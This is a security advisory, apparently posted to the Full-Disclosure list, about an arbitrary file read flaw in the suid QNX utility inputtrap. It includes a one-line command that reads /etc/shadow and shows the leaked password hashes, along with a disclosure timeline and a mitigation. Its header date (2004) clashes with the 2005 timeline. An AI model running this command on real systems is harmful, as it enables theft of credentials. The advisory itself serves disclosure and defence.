*** rfdslabs security advisory ***
Title: QNX inputtrap arbitrary file read vulnerability [RLSA_01-2005] Versions: QNX RTOS 6.3, 6.1.0 (possibly others) Vendor: http://www.qnx.com Date: Feb 22 2004
Author: Julio Cesar Fort <julio NO_SPAM rfdslabs com br>
inputtrap is a utility designed to detect and start input manager in QNX.
inputtrap has a '-t' flag to specify the trap file to be read. Due to impro- per permissions checking, we have administrative access to read files anywhere in the disk in addition with 'start' flag.
The following simple command will show us /etc/shadow:
$ inputtrap -t /etc/shadow start options: Unable to lookup root:21QjUKxP9gEJK:0:0:0 in modules table options: Unable to lookup sandimas:91UzHxvt3x1n2:0:0:0 in modules table
PS: This "design error" problem is similar to an old Debian 1.1 DOSEmu vulnera- bility, back in 1999. And it was, surely, erradicated in crucial programs of most operating systems.
No official solution yet. We suggest remove inputtrap suid bit or change its permissions to a trusted group of users until QNX doesn't release an official patch.
22 Feb 2005: Vulnerability detected (in a very very boring day, ill at home); 09 Jun 2005: Advisory sent to QNX; 10 Jun 2005: QNX contacted rfdslabs; 24 Aug 2005: Advisory sent to security mailing lists.
Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury, Rodrigo Costa (NERV), Despise, gotfault.org and everyone at rfdslabs.
www.rfdslabs.com.br - computers, sex, human mind, music and more Recife, PE, Brazil
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/